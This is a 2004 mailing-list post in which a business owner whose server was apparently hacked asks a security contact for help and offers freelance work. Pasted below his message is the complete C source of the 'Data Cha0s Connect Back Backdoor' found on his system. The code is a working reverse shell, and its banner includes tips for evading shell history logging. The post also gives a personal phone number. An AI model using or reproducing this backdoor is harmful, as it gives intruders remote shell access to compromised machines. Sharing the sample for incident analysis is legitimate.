security (continued)

cliff at cliffmeyers.com cliff at cliffmeyers.com
Mon Feb 2 16:18:22 EST 2004 

Brad,


The source code is actually pretty small (3 KB).  I've pasted it at the end of
this message.

So, in the event that I get hacked *again* after doing my re-install tonight,
what would you recommend?  Would you consider coming in to do some freelance
security work for my company?  We could probably pay you some good cash assuming
you would be able to show us some tangible results in the end.  My assistant,
Phil LaNasa, recognized your name and said he had worked with you to some extent
when he was at Northwoods Insurance.  He also keeps in contact with Amedeo
Mariani (sp?) who is currently fixing a broken printer or two of ours here at the
office.  From what Phil tells me, you and Amedeo have done work together?

What do you think?  Feel free to give me a call if you like, my cellular is 716
907 3560.  Hope to hear from you - thanks.


-Cliff



# dc-connectback.c #

#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
int main(int argc, char **argv) {
  char *host;
  int port = 80;
  int f;
  int l;
  int sock;
  struct in_addr ia;
  struct sockaddr_in sin, from;
  struct hostent *he;
  char msg[ ] = "Welcome to Data Cha0s Connect Back Shell\n\n"
                "Issue \"export TERM=xterm; exec bash -i\"\n"
                "For More Reliable Shell.\n"
                "Issue \"unset HISTFILE; unset SAVEHIST\"\n"
                "For Not Getting Logged.\n(;\n\n";
  printf("Data Cha0s Connect Back Backdoor\n\n");
  if (argc < 2 || argc > 3) {
    printf("Usage: %s [Host] <port>\n", argv[0]);
    return 1;
  }
  printf("[*] Dumping Arguments\n");
  l = strlen(argv[1]);
  if (l <= 0) {
    printf("[-] Invalid Host Name\n");
    return 1;
  }
  if (!(host = (char *) malloc(l))) {
    printf("[-] Unable to Allocate Memory\n");
    return 1;
  }
  strncpy(host, argv[1], l);
  if (argc == 3) {
    port = atoi(argv[2]);
    if (port <= 0 || port > 65535) {
      printf("[-] Invalid Port Number\n");
      return 1;
    }
  }
  printf("[*] Resolving Host Name\n");
  he = gethostbyname(host);
  if (he) {
    memcpy(&ia.s_addr, he->h_addr, 4);
  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {
    printf("[-] Unable to Resolve: %s\n", host);
    return 1;
  }
  sin.sin_family = PF_INET;
  sin.sin_addr.s_addr = ia.s_addr;
  sin.sin_port = htons(port);
  printf("[*] Connecting...\n");
  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
    printf("[-] Socket Error\n");
    return 1;
  }
  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {
    printf("[-] Unable to Connect\n");
    return 1;
  }
  printf("[*] Spawning Shell\n");
  f = fork( );
  if (f < 0) {
    printf("[-] Unable to Fork\n");
    return 1;
  } else if (!f) {
    write(sock, msg, sizeof(msg));
    dup2(sock, 0);
    dup2(sock, 1);
    dup2(sock, 2);
    execl("/bin/sh", "shell", NULL);
    close(sock);
    return 0;
  }
  printf("[*] Detached\n\n");
  return 0;
}

More information about the nflug mailing list